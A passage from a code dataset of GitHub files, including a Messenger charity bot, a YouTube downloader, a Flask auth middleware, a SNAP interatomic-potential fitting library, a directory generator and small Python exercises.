'access_token': default_config.FB_PAGE_TOKEN\n },\n headers={\n 'Content-Type': 'application/json'\n },\n data=json.dumps({\n 'recipient': {'id': sender_id},\n 'message': messageData\n }\n )\n )\n return\n\ndef resendPostBack(sender_id, message_text):\n messageData = {\n 'attachment':{\n 'type': 'template',\n 'payload': {\n 'template_type':'button',\n 'text':message_text,\n 'buttons':[{\n 'type':'postback',\n 'title':'ค้นหาใหม่',\n 'payload':'ค้นหา'\n }]\n }\n }\n }\n r = requests.post(\n 'https://graph.facebook.com/v2.6/me/messages',\n params={\n 'access_token': default_config.FB_PAGE_TOKEN\n },\n headers={\n 'Content-Type': 'application/json'\n },\n data=json.dumps({\n 'recipient': {'id': sender_id},\n 'message': messageData\n }\n )\n )\n return ''\n\ndef searchProject(sender_id, message_text,doc):\n if(doc['chatState'] == 0):\n chatState = 1\n send_message(sender_id, 'ให้เหมียวช่วยหาโครงการเกี่ยวกับอะไรดีล่ะ ? ')\n user.insert({'sender_id' : sender_id,'sender_name':doc['sender_name'] ,'message_text' : message_text, 'chatState' : chatState})\n else:\n a = str(datetime.now())\n date = a[0:10]\n taejai = mongo.db.taejai\n predict = predictProject(message_text)\n result = taejai.find({'id' : int(predict), 'end_date' : {'$gte' : date}})\n # result = taejai.find({'name' : {'$regex': message_text, '$options' : 'i'}, 'end_date' : {'$gte': date} }).limit(3)\n if result.count() <= 0:\n resendPostBack(sender_id, 'เหมียว ลองหาแล้วแต่ไม่เจอเลยอ่ะ ลองค้นหาใหม่ดูนะ')\n user.insert({'sender_id' : sender_id,'sender_name':doc['sender_name'] ,'message_text' : message_text, 'chatState' : 0})\n return\n sendProjectCard(result, sender_id)\n chatState = 0\n user.insert({'sender_id' : sender_id,'sender_name':doc['sender_name'] ,'message_text' : message_text, 'chatState' : chatState})\n return\n\ndef tadkaam(txt):\n bd = PyICU.BreakIterator.createWordInstance(PyICU.Locale(\"th\"))\n bd.setText(txt)\n lastPos = bd.first()\n retTxt = \"\"\n try:\n while(1):\n currentPos = next(bd)\n retTxt += txt[lastPos:currentPos]\n if(currentPos < len(txt)):\n retTxt += \"|\"\n lastPos = currentPos\n except StopIteration:\n pass\n words = retTxt.split('|')\n return words\n\ndef predictProject(txt):\n k = ''\n result = function.get_result(txt)\n for res in result:\n k += str(res)\n return k\n\n\n","repo_name":"numchiew/taejaiBot-demo","sub_path":"app/app/webhook/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":14225,"program_lang":"python","lang":"th","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39295787635","text":"import pytube\nimport shutil\n\n\nprint('\\nCole o Link do video aqui: ')\nlink = input()\n\ndef baixar(link, extencao):\n yt = pytube.YouTube(link) #Prepara\n titulo = yt.title\n print(f'\\nBaixando: {titulo}...\\n')\n ys = yt.streams.get_highest_resolution()#Melhor resolução\n ys.download() #Download\n #Tirando Caracteres especiais\n titulo = titulo.replace('|','')\n titulo = titulo.replace('#','')\n titulo = titulo.replace('?','')\n titulo = titulo.replace(',','')\n print('\\n')\n caminho_original =r'D:\\Brincadeiras em Python\\{}.mp4'.format(titulo)# Caminho Depois de baixar\n caminho_novo = r'C:\\Users\\leona\\Downloads\\{}'.format(titulo)#Pasta Downloads\n caminho_novo = caminho_novo+extencao\n print(caminho_novo,' ',caminho_original)\n shutil.move(caminho_original,caminho_novo)# Movendo o video\n print(f'\\n\\nVocê pode ver o arquivo em {caminho_novo}\\n\\n') #Local completo do video\n\nbaixar(link,'.mp3')\nbaixar(link,'.mp4')","repo_name":"LeonardoMaragna11/BaixarVideosdoyoutubecompython","sub_path":"Pytube 2.0.py","file_name":"Pytube 2.0.py","file_ext":"py","file_size_in_byte":960,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70165194410","text":"#!/usr/bin/env python\nfrom pathlib import Path\n\nimport setuptools\nfrom setuptools import setup\n\n\ndef load_reqs(path):\n reqs = []\n with open(path, \"r\") as f:\n for line in f.readlines():\n if line.startswith(\"-r\"):\n reqs += load_reqs(line.split(\" \")[1].strip())\n else:\n req = line.strip()\n if req and not req.startswith(\"#\"):\n reqs.append(req)\n return reqs\n\n\nreq_path = Path(__file__).parent / \"requirements.txt\"\nrequirements = load_reqs(req_path)\n\nlong_description = open(Path(__file__).parent / \"README.md\").read()\n\n\nsetup(\n name=\"pandas_path\",\n url=\"https://github.com/drivendataorg/pandas-path\",\n project_urls={\n \"Source Code\": \"https://github.com/drivendataorg/pandas-path\",\n \"DrivenData\": \"http://drivendata.co\",\n },\n version=\"0.3.0\",\n author=\"DrivenData\",\n author_email=\"info@drivendata.org\",\n include_package_data=True,\n description=\"Pathlib functionality for pandas.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n license=\"MIT\",\n packages=setuptools.find_packages(),\n keywords=[\"data science\"],\n python_requires=\">=3.6\",\n install_requires=requirements,\n classifiers=[\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.6\",\n # Indicate who your project is intended for\n \"Intended Audience :: Developers\",\n \"Intended Audience :: Science/Research\",\n \"License :: OSI Approved :: MIT License\",\n \"Topic :: Scientific/Engineering\",\n \"Topic :: Scientific/Engineering :: Artificial Intelligence\",\n ],\n)\n","repo_name":"drivendataorg/pandas-path","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"53"} +{"seq_id":"12431707202","text":"from flask import abort\nimport requests\n\ndef authControl(headers):\n url = 'http://localhost:8000/api/tokenCheck'\n\n response = requests.post(url, headers={\n 'Authorization': headers.get('Authorization'),\n 'userId': headers.get('userId')\n })\n if response.status_code != 200 or response.text == 'false':\n abort(401, 'Token Is Invalid')\n else:\n print('Token success')\n","repo_name":"selahattingns/python-mongodb-microservice","sub_path":"app/middlewares/auth_middleware.py","file_name":"auth_middleware.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40845531667","text":"import numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import ParameterGrid\nfrom itertools import product\n\nfrom explore.CatCat import CatCat\n\n\ndef data_iter():\n\n np.random.seed(2342)\n\n n = 30\n\n # 2 classes\n a = np.random.choice([0, 1], size=n).astype(str)\n b = np.random.choice([0, 1, 3], size=n).astype(str)\n\n for a, b in format_iter(a, b):\n yield a, b\n\n\ndef format_iter(a, b):\n \"\"\"\n Iterates over various formats\n \"\"\"\n\n yield a, b\n\n a = pd.Series(a)\n b = pd.Series(b)\n yield a, b\n\n a = a.astype('category')\n yield a, b\n\n a.name = 'woof'\n b.name = 'meow'\n yield a, b\n\n a.iloc[0] = np.nan\n b.iloc[1] = np.nan\n yield a, b\n\n\ndef settings_iter():\n settings = {'alpha': [0.05],\n 'nan_how': ['drop', 'leave']}\n\n for setting in ParameterGrid(settings):\n yield setting\n\n\ndef test_settings():\n \"\"\"\n Makes sure different settings of ContCont run.\n \"\"\"\n\n for (cont, cat), settings in product(data_iter(),\n settings_iter()):\n\n test = CatCat(**settings)\n test = test.fit(cont, cat)\n test.plot()\n assert True\n","repo_name":"idc9/explore","sub_path":"explore/tests/test_CatCat.py","file_name":"test_CatCat.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8254532629","text":"from multiprocessing import allow_connection_pickling\nimport sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom monty.serialization import loadfn\nfrom maml.utils import pool_from, convert_docs\nimport json\nimport os\nimport random\nimport subprocess\nimport glob, shutil\n\n# local environment descriptors imports\nfrom maml.describers import BispectrumCoefficients\nfrom sklearn.decomposition import PCA\n\n# machine learning interatomic potentials imports\nfrom maml.base import SKLModel\nfrom maml.apps.pes import SNAPotential\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.linear_model import LinearRegression\n\nimport pandas as pd\n\n# materials properties prediction imports\nfrom pymatgen.core import Structure, Lattice\nfrom maml.apps.pes import LatticeConstant, ElasticConstant, NudgedElasticBand, DefectFormation\n\n# disable logging information\nimport logging\nlogging.disable(logging.CRITICAL)\nimport warnings\nwarnings.simplefilter('ignore')\nimport time\nfrom monty.os.path import which\n\nfrom snap_metrics import *\nfrom lammps import lammps\n\ndef load_folder(folder, verbose = False):\n ############### <<< LOAD DATA #####################\n if folder[-1]!=\"/\": folder=folder+\"/\"\n filelist_in_folder = os.listdir(folder)\n datalist={filename : loadfn(folder+filename)[0] for filename in filelist_in_folder}\n\n if verbose: print(\"Loaded {} , {} files (configurations)\".format(folder, len(datalist)))\n\n structures = [datalist[filename]['structure'] for filename in datalist]\n energies = [datalist[filename]['data']['energy_per_atom']*len(datalist[filename]['structure']) for filename in datalist] ### if 'outputs' in vaspdata[0] : energies = [d['outputs']['energy'] for d in vaspdata]\n forces = [datalist[filename]['data']['forces'] for filename in datalist] ### if 'outputs' in vaspdata[0] : forces = [d['outputs']['forces'] for d in vaspdata]\n stresses = [datalist[filename]['data']['virial_stress'] for filename in datalist]\n stresses = [[stress/10.0 for stress in tenz] for tenz in stresses] ### maml wants GPa\n\n if verbose: print(\" # of structures in data: {}\\n\".format(len(structures)),\n \"# of energies in data: {}\\n\".format(len(energies)),\n \"# of forces in data: {}\\n\".format(len(forces)))\n\n feature_types = []\n feature_filename = []\n for num, configuration in enumerate(structures):\n if len(configuration)>1 : feature_types.append(\"en\")\n else : feature_types.append(\"en0\")\n feature_filename.append(filelist_in_folder[num])\n\n for LatticeCite in configuration:\n for i in range(3) : \n feature_types.append(str(LatticeCite.species.elements[0]))\n feature_filename.append(filelist_in_folder[num])\n for i in range(6) : \n feature_types.append(\"st\") \n feature_filename.append(filelist_in_folder[num])\n folder = folder[:-1]\n #Возвращает кортеж соответствующих списков - структуры, энергии, силы, давления и список типов фичей, полученные из всех структур в папке\n return({'structures': structures, 'energies': energies, 'forces': forces, 'stresses': stresses, 'feature_types' : feature_types, 'feature_folder' : folder, 'feature_filename' : feature_filename})\n\n\ndef weights_in_set(set, set_weight, elem_weight_list, energy_weight, stress_weight, name_l, en0_weight = 20.0):\n en_weight_default = energy_weight/0.1 ### Ошибка в 0.1 эВ/атом равносильна ошибке в 1 эВ/А\n st_weight_default = stress_weight/100 ### Ошибка в 100 GPa равносильна ошибке в 1 эВ/А , 6 компонент\n f_weight_default = 1 ## \n\n weights_in_set = []\n en_count = set[\"feature_types\"].count(\"en0\")+set[\"feature_types\"].count(\"en\")\n st_count = set[\"feature_types\"].count(\"st\")\n f_count = (len(set[\"feature_types\"]) - en_count - st_count)/en_count\n for feature_type in set[\"feature_types\"]:\n weight = 1.0\n if feature_type == \"en0\" : weight = en0_weight * en_weight_default*set_weight/en_count\n if feature_type == \"en\" : weight = en_weight_default*set_weight\n for i in range(len(name_l)):\n if feature_type == name_l[i] : weight = f_weight_default*elem_weight_list[i]*set_weight/f_count\n if feature_type == \"st\" : weight = st_weight_default*set_weight/6.0\n weights_in_set.append(weight)\n return(weights_in_set)\n\ndef concatenate_sets(list_of_sets):\n structures = [a for set in list_of_sets for a in set['structures']]\n energies = [a for set in list_of_sets for a in set['energies']]\n forces = [a for set in list_of_sets for a in set['forces']]\n stresses = [a for set in list_of_sets for a in set['stresses']]\n feature_types = [a for set in list_of_sets for a in set['feature_types']]\n folder = [set['feature_folder'] for set in list_of_sets for a in set['feature_types']]\n filenames = [a for set in list_of_sets for a in set['feature_filename']]\n return({'structures': structures, 'energies': energies, 'forces': forces, 'stresses': stresses, 'feature_types' : feature_types, 'feature_folder' : folder, 'feature_filename' : filenames})\n\ndef load_list_of_sets(folder_list, verbose = False):\n list_of_train_sets = [] \n for folder in folder_list:\n list_of_train_sets.append(load_folder(folder, verbose))\n return(list_of_train_sets)\n\nclass SNAP_model:\n def set_parameters(self, name_l,r_l,w_l, twojmax , quadratic = False, rcutfac = 0.5):\n self.file_param=open(\"param\", \"a\")\n self.n_threads = 128\n self.rcutfac = rcutfac\n self.name_l = name_l\n self.r_l = r_l\n self.w_l = w_l\n self.quadratic = quadratic\n self.twojmax = twojmax\n\n def update_weights(self, energy_weight, stress_weight , elem_weight_list, en0_weight=20.0):\n self.energy_weight = energy_weight\n self.stress_weight = stress_weight \n self.elem_weight_list = elem_weight_list\n self.en0_weight = en0_weight\n\n def update_set_weight_list(self, set_weight_list):\n self.set_weight_list = set_weight_list \n\n def write_features(self, set, label):\n per_force_features = self.per_force_describer.transform(set['structures'])\n per_force_features.to_csv('train_features_dataframe_'+label, sep=\",\")\n\n def write_snap_to_files(self):\n self.snap.write_param()\n\n def fit_SNAP(self, list_of_train_sets):\n\n if len(list_of_train_sets)!=len(self.set_weight_list) : \n print (\"Error len(self.list_of_train_sets)!=len(self.set_weight_list) \")\n quit() \n\n self.weights_all = []\n for s, set in enumerate(list_of_train_sets):\n self.weights_all+=weights_in_set(set, self.set_weight_list[s], self.elem_weight_list, self.energy_weight, self.stress_weight, self.name_l, en0_weight=self.en0_weight)\n\n\n self.train_set = concatenate_sets(list_of_train_sets)\n\n self.element_profile = {}\n for i in range(len(self.name_l)):\n self.element_profile.update({self.name_l[i]: {'r': self.r_l[i], 'w': self.w_l[i]}})\n\n\n warnings.filterwarnings(\"ignore\")\n\n self.per_force_describer = BispectrumCoefficients(rcutfac=self.rcutfac, twojmax=self.twojmax, \n element_profile=self.element_profile, \n quadratic=self.quadratic, \n pot_fit=True, \n include_stress=True, \n n_jobs=self.n_threads, verbose=False)\n tm=time.time()\n ml_model = LinearRegression()\n skl_model = SKLModel(describer=self.per_force_describer, model=ml_model)\n self.snap = SNAPotential(model=skl_model)\n # Train the potential with lists of structures, energies, forces\n self.snap.train(self.train_set['structures'], self.train_set['energies'], self.train_set['forces'], self.train_set['stresses'], include_stress=True, sample_weight=self.weights_all)\n for f in glob.glob(\"tmp*\"):\n shutil.rmtree(f, ignore_errors=True)\n self.write_snap_to_files()\n self.fit_info_str = \" En_w {:.3f} St_w {:.3f} // r_l {} w_l {} elem_w {} // folders {} /// \".format(self.energy_weight, self.stress_weight, str([round(i, 2) for i in self.r_l]), str([round(i, 2) for i in self.w_l]), str([round(i, 2) for i in self.elem_weight_list]), str([round(i, 2) for i in self.set_weight_list]) )\n\n def set_test_set(self, list_of_test_sets):\n self.list_of_test_sets = list_of_test_sets\n self.test_set = concatenate_sets(list_of_test_sets)\n\n def evaluate_testdata(self, test_set, label = \"\"): \n test_structures, test_energies, test_forces, test_stresses = test_set['structures'], test_set['energies'], test_set['forces'], test_set['stresses']\n test_feature_types, test_folder, test_filenames = test_set['feature_types'], test_set['feature_folder'], test_set['feature_filename']\n\n df_orig, df_predict = self.snap.evaluate(test_structures, test_energies, test_forces, test_stresses, include_stress=True)\n orig = df_orig['y_orig'] / df_orig['n']\n predict = df_predict['y_orig'] / df_predict['n']\n\n test_weights = weights_in_set(test_set, 1, self.elem_weight_list, self.energy_weight, self.stress_weight, self.name_l)\n\n evaluate_info_dataframe = pd.DataFrame({'orig': orig , 'predict': predict , 'weight': test_weights , 'feature_type' : test_feature_types, 'folder' : test_folder, 'filename' : test_filenames})\n evaluate_info_dataframe.to_csv('orig_vs_predict_'+label, sep=\" \")\n\n self.test_dataframe = evaluate_info_dataframe\n\n def count_RMSE_predictors(self):\n df = self.test_dataframe\n name_l = list(df.feature_type.unique()) ; name_l.remove(\"en\")\n if (\"en0\" in name_l) : name_l.remove(\"en0\")\n name_l.remove(\"st\") \n \n self.RMSE_f = {}\n for elem in name_l:\n self.RMSE_f.update({elem : round(mean_squared_error(df.orig[df.feature_type == elem], df.predict[df.feature_type == elem], squared=False), 3) })\n self.RMSE_e = mean_squared_error(df.orig[df.feature_type == \"en\"], df.predict[df.feature_type == \"en\"], squared=False)\n self.RMSE_s = mean_squared_error(df.orig[df.feature_type == \"st\"], df.predict[df.feature_type == \"st\"], squared=False) # mean_squared_error(original_stress, weighted_predict_stress)\n self.RMSE_f_total = mean_squared_error(df.orig[df['feature_type'].apply(lambda s: s in name_l )], df.predict[df['feature_type'].apply(lambda s: s in name_l )], squared=False)\n\n self.force_relative_err = self.RMSE_f_total/df.orig[df['feature_type'].apply(lambda s: s in name_l )].abs().mean()\n self.stress_relative_err = self.RMSE_s/df.orig[df.feature_type == \"st\"].abs().mean()\n self.energy_relative_err = self.RMSE_e/1 ### характерный порядок энергий, в рамках которого предсказываем - 1 эВ (df.orig[df.feature_type == \"en\"].max() - df.orig[df.feature_type == \"en\"].min())\n\n self.RMSE_predictors = mean_squared_error(df.orig, df.predict, squared=False, sample_weight = df.weight)\n self.RMSE_predictors_info_str = \" F {:.3f} (by elem {}) // EN {:.3f} // ST {:.3f} // All = {:.3f} \".format(self.RMSE_f_total, str(self.RMSE_f), self.RMSE_e, self.RMSE_s, self.RMSE_predictors )\n\n\n ############### ФУНКЦИИ ДЛЯ РАСЧЕТА ДЕФЕКТОВ ##################\n\n def evaluate_defects(self):\n self.lattice_constant = find_lattice_constant()\n defects = {}\n keys = ['ideal', 'Uvac', 'Nvac', 'Uint', 'UDD', 'Nint']\n for key in keys:\n defects[key] = calculate_defect_energy(self.lattice_constant, key)\n\n chempot = defects['ideal']/64\n defects['ideal'] = defects['ideal'] - 64*chempot\n defects['Uvac'] = defects['Uvac'] - 63*chempot\n defects['Nvac'] = defects['Nvac'] - 63*chempot\n defects['Uint'] = defects['Uint'] - 65*chempot\n defects['UDD'] = defects['UDD'] - 65*chempot\n defects['Nint'] = defects['Nint'] - 65*chempot\n\n reference = {'ideal' : 0.00, 'Uvac' : 3.25, \"Nvac\" : 1.88, 'Uint' : 7.07, 'Nint' : 3.17, 'UDD' : 5.00}\n\n self.defect_dataframe = pd.DataFrame({\"def\" : pd.Series(defects), \"ref\" : pd.Series(reference)}, index = pd.Series(defects).index)\n \n self.defect_dataframe.loc[\"UFP\"]=self.defect_dataframe.loc[\"Uvac\"]+self.defect_dataframe.loc[\"Uint\"]\n self.defect_dataframe.loc[\"NFP\"]=self.defect_dataframe.loc[\"Nvac\"]+self.defect_dataframe.loc[\"Nint\"]\n self.defect_dataframe.loc[\"UFP_DD\"]=self.defect_dataframe.loc[\"Uvac\"]+self.defect_dataframe.loc[\"UDD\"]\n self.defect_dataframe.loc[\"SD\"]=self.defect_dataframe.loc[\"Uvac\"]+self.defect_dataframe.loc[\"Nvac\"]\n self.defect_dataframe.loc[\"ASD\"]=self.defect_dataframe.loc[\"Uint\"]+self.defect_dataframe.loc[\"Nint\"]\n self.defect_dataframe.loc[\"ASD_DD\"]=self.defect_dataframe.loc[\"UDD\"]+self.defect_dataframe.loc[\"Nint\"]\n\n self.defect_dataframe['diff'] = (self.defect_dataframe['def'] - self.defect_dataframe['ref']).round(decimals=2)\n self.defect_dataframe['def'].round(decimals=2)\n self.neutral_def=self.defect_dataframe.loc[['UFP','NFP','UFP_DD', 'SD', 'ASD', 'ASD_DD']]\n self.RMSE_def = np.sqrt(mean_squared_error(self.neutral_def['def'], self.neutral_def['ref']))\n self.RMSE_defects_info_str = \" // RMSE_DEF = {:.3f} // \".format(self.RMSE_def)\n\nclass DE_algo:\n def set_de_parameters(self, mut=0.8, crossp=0.7, popsize=20, its=10000):\n self.mut = mut\n self.crossp=crossp\n self.popsize=popsize \n self.its=its\n\n def set_name_l(self, name_l):\n self.name_l = name_l\n\n def set_snap_parameters(self, quadratic=True, twojmax=6):\n self.quadratic=quadratic\n self.twojmax=twojmax\n\n def set_train_test_data(self, list_of_train_sets, list_of_test_sets=\"nan\",):\n self.list_of_train_sets = list_of_train_sets\n if list_of_test_sets==\"nan\": self.list_of_test_sets = list_of_train_sets\n else: self.list_of_test_sets = list_of_test_sets\n self.test_set = concatenate_sets(self.list_of_test_sets)\n\n def set_bounds(self, bounds_universal, bounds_per_element, bounds_folders):\n self.bounds_universal = bounds_universal\n self.bounds_per_element = bounds_per_element\n self.bounds_folders = bounds_folders\n\n def set_metric_func(self, metric_func):\n self.metric_func = metric_func\n\n def concatenate_bounds(self, log_folder_weight = False, log_universal_weights = False):\n def to_tuple(tuple_or_number):\n if type(tuple_or_number)==tuple: return tuple_or_number\n else: return (tuple_or_number, tuple_or_number)\n\n self.bounds = []\n self.bounds.append(to_tuple(self.bounds_universal['en_weight']))\n self.bounds.append(to_tuple(self.bounds_universal['st_weight']))\n\n for elem in self.name_l:\n self.bounds.append(to_tuple(self.bounds_per_element[elem]['r_c']))\n self.bounds.append(to_tuple(self.bounds_per_element[elem]['w_sna']))\n self.bounds.append(to_tuple(self.bounds_per_element[elem]['weight_of_elem_force'])) \n \n for bound in self.bounds_folders:\n self.bounds.append(to_tuple(bound))\n\n def unpack_de_parameter(self, de_parameter_list):\n de_parameter_list = list(de_parameter_list)\n self.energy_weight = de_parameter_list.pop(0)\n self.stress_weight = de_parameter_list.pop(0)\n self.r_l = []\n self.w_l = []\n self.elem_weight_list = []\n for elem in self.name_l:\n self.r_l.append(de_parameter_list.pop(0))\n self.w_l.append(de_parameter_list.pop(0))\n self.elem_weight_list.append(de_parameter_list.pop(0))\n\n self.set_weight_list = de_parameter_list\n\n def perform(self):\n self.de_fit_num = 0\n self.concatenate_bounds()\n print('SSSSSSSSSS')\n dimensions = len(self.bounds)\n pop = np.random.rand(self.popsize, dimensions)\n min_b, max_b = np.asarray(self.bounds).T\n diff = np.fabs(min_b - max_b)\n pop_denorm = min_b + pop * diff\n print('SSSS')\n fitness = np.asarray([self.fit_function(ind) for ind in pop_denorm])\n best_idx = np.argmin(fitness)\n best = pop_denorm[best_idx]\n print(\"Population made\")\n for i in range(self.its):\n for j in range(self.popsize):\n idxs = [idx for idx in range(self.popsize) if idx != j]\n a, b, c = pop[np.random.choice(idxs, 3, replace = False)]\n mutant = np.clip(a + self.mut * (b - c), 0, 1)\n cross_points = np.random.rand(dimensions) < self.crossp\n if not np.any(cross_points):\n cross_points[np.random.randint(0, dimensions)] = True\n trial = np.where(cross_points, mutant, pop[j])\n trial_denorm = min_b + trial * diff\n f = self.fit_function(trial_denorm)\n if f < fitness[j]:\n fitness[j] = f\n pop[j] = trial\n if f < fitness[best_idx]:\n best_idx = j\n best = trial_denorm\n #yield best, fitness[best_idx]\n\n def fit_function(self, de_parameter_list):\n self.de_fit_num+=1\n self.unpack_de_parameter(de_parameter_list)\n self.snap_model = SNAP_model()\n self.snap_model.set_parameters(self.name_l, self.r_l, self.w_l, quadratic=self.quadratic, twojmax=self.twojmax) \n self.snap_model.update_weights(energy_weight=self.energy_weight,stress_weight=self.stress_weight, elem_weight_list=self.elem_weight_list, en0_weight=100)\n self.snap_model.update_set_weight_list(self.set_weight_list)\n self.snap_model.fit_SNAP(self.list_of_train_sets)\n self.snap_model.set_test_set(self.list_of_test_sets)\n self.metric_result = self.metric_func(self.snap_model)\n self.de_output()\n return(self.metric_result)\n\n def de_output(self):\n f=open(\"DE_history.txt\", \"a\")\n\n print(self.de_fit_num, end = ' ')\n print(self.snap_model.fit_info_str, end = ' ')\n print(self.snap_model.RMSE_predictors_info_str, end = ' ')\n print(self.snap_model.RMSE_defects_info_str, end = '\\n')\n print(\" MY METRIC = \"+str(round(self.metric_result,2)), end = '\\n')\n\n f.write(str(self.de_fit_num)+\")) \")\n f.write(self.snap_model.fit_info_str+\" \")\n f.write(self.snap_model.RMSE_predictors_info_str+\" \")\n f.write(self.snap_model.RMSE_defects_info_str+\"\")\n f.write(\" MY METRIC = \"+str(round(self.metric_result,2))+\"\\n\")\n f.close()\n\n f=open(\"DE_big_history.txt\", \"a\") \n sm = self.snap_model\n par_list = [self.de_fit_num] + sm.r_l + sm.w_l + sm.elem_weight_list + [sm.energy_weight] + [sm.stress_weight] + sm.set_weight_list\n all_info_row = par_list + [sm.RMSE_f_total, sm.RMSE_e, sm.RMSE_s, sm.RMSE_predictors ] + list(sm.neutral_def['def'])\n f.write(str(all_info_row)[1:-1]+\"\\n\")\n f.close()\n\n\ndef check_bounds_consistance(obj_list, bounds):\n if len(obj_list)!=len(bounds): \n print(\"Bounds len error\") \n quit()","repo_name":"AlexanderAntropov/SNAP_MODULES","sub_path":"my_snap_lib.py","file_name":"my_snap_lib.py","file_ext":"py","file_size_in_byte":19687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74907787366","text":"def convertir_a_decimal(binario):\n res = 0\n for i in range(len(str(binario))):\n mult = int(binario[i]) * (2**i)\n res = res + mult\n return res\n\n\ndef convertir_a_binario(decimal):\n binario = \"\"\n while decimal // 2 != 0:\n binario = str(decimal % 2) + binario\n decimal = decimal // 2\n return str(decimal) + binario\n\n\ndef imprimir_resultado(resultado):\n print(\"El valor de {} es {}\".format(valor, resultado))\n\n\nopcion = int(input(\n \"1-> Para convertir de DECIMAL a BINARIO. \\n2-> Para convertir de BINARIO a DECIMAL.\\n¿Qué conversión deseas hacer? \"))\n\nif opcion == 1:\n valor = int(input(\"\\nIngresa el decimal: \"))\n conversion = convertir_a_binario(valor)\n imprimir_resultado(conversion)\nelif opcion == 2:\n valor = input(\"\\nIngresa el binario: \")\n conversion = convertir_a_decimal(valor)\n imprimir_resultado(conversion)\nelse:\n print(\"\\n{} no es una opción.\".format(opcion))\n","repo_name":"ALEXB0W/python_conversion_decimal_binario","sub_path":"binario-decimal.py","file_name":"binario-decimal.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28497638011","text":"from tkinter import *\nfrom random import randint\n\nroot=Tk()\nroot.title('Random Winner Generator')\nroot.iconbitmap('images/encrypt.ico')\nroot.geometry('400x400')\n\n\n\ndef pick():\n # 21 entries\n entries = ['Vishwa','Mandipa','Navitha','Supun','Yasitha','Miyuru','Chanithu','Sachin','Uthsala','Amayuru','Dulaj','Sithil','Yumeth','Sahan','Anupama','Dimuthu','Tharuka','Vihanga','Janidu','Hashen','Vishwa']\n \n # convert list to set (to remove duplicate values)\n entries_set=set(entries)\n \n # convert back to list - 20\n unique_entries=list(entries_set)\n\n # create our list size variable\n our_number = len(unique_entries)-1\n\n # create a random number between 0 and 19\n rando = randint(0,our_number)\n\n winnnerLabel=Label(root,text=unique_entries[rando],font=('Helvatica',18))\n winnnerLabel.pack(pady=50)\n\ntopLabel=Label(root,text='Win-O-Rama!',font=('Helvatica', 24))\ntopLabel.pack(pady=20)\n\nwinButton=Button(root,text='PICK OUR WINNERS!!',font=('Helvatica',24),command=pick)\nwinButton.pack(pady=20)\n\nroot.mainloop()","repo_name":"vps4618/Tkinter_Codemy","sub_path":"Random Winner Generator.py","file_name":"Random Winner Generator.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32739082165","text":"N, K = map(int,input().split())\r\n\r\ncoin = []\r\n\r\nfor i in range(N):\r\n c = int(input())\r\n coin.append(c)\r\n\r\nanswer = 0\r\nfor ablecoin in coin[::-1]:\r\n count = K // ablecoin\r\n if count > 0:\r\n answer += count\r\n K = K - count * ablecoin\r\n\r\nprint(answer)\r\n\r\n","repo_name":"SIDED00R/Code_training","sub_path":"백준/Silver/11047. 동전 0/동전 0.py","file_name":"동전 0.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41342323492","text":"import json\nimport os\nimport re\n\nfrom parser import Parser\nimport shutil\n\n\nclass StructureGenerator:\n def __init__(self, root_path: str, json_path: str):\n self.parser = Parser(root_path, json_path)\n\n def run(self) -> None:\n dir_structure = self.parser.get_json_dict()\n StructureGenerator.create_or_delete_dir(self.parser.root_path)\n self.generate_structure(dir_structure, self.parser.root_path)\n self.pretty_print_structure(dir_structure)\n\n # Generate json from dir\n # dir_structure = self.parser.get_json_dict_from_dir(self.parser.root_path)[self.parser.root_path]\n # to_print = json.dumps(dir_structure, indent=2)\n # json_file = open(self.parser.json_path, \"w\")\n # json_file.write(to_print)\n # json_file.close()\n\n @staticmethod\n def generate_structure(dir_structure, root):\n for key in dir_structure.keys():\n key_path = os.path.join(root, key)\n if type(dir_structure[key]) == dict:\n StructureGenerator.create_or_delete_dir(key_path)\n StructureGenerator.generate_structure(dir_structure[key], key_path)\n continue\n file = open(key_path, mode=\"w\")\n file.write(dir_structure[key])\n file.close()\n\n @staticmethod\n def create_or_delete_dir(dir_path):\n try:\n os.mkdir(dir_path)\n except FileExistsError:\n try:\n shutil.rmtree(dir_path)\n os.mkdir(dir_path)\n except OSError as e:\n print(f\"Could not delete {dir_path}, because: {e.strerror}\")\n\n def pretty_print_structure(self, dir_structure: dict) -> None:\n print(\"~~~The generated structure:~~~\")\n print(self.parser.root_path)\n\n result = json.dumps(dir_structure, indent=\"---\")\n replacements = [\n (r'\\{|\\}|\"|,', \"\"), # delete { } \" and ,\n (r'-+\\n', \"\"), # delete empty lines with -\n (r':\\s+(?=-)', \"\\n\") # replace :\\n+ with \\n\n ]\n for old, new in replacements:\n result = re.sub(old, new, result)\n print(result.strip())\n","repo_name":"InagoesIT/GenerateStructure","sub_path":"structure_generator.py","file_name":"structure_generator.py","file_ext":"py","file_size_in_byte":2153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14256710756","text":"# Link to Program : https://www.hackerrank.com/challenges/alphabet-rangoli/problem\r\n\r\nimport string\r\n\r\n\r\ndef print_rangoli(size):\r\n alphabets = string.ascii_lowercase\r\n\r\n ascending_list = list(alphabets[0: size])\r\n descending_list = 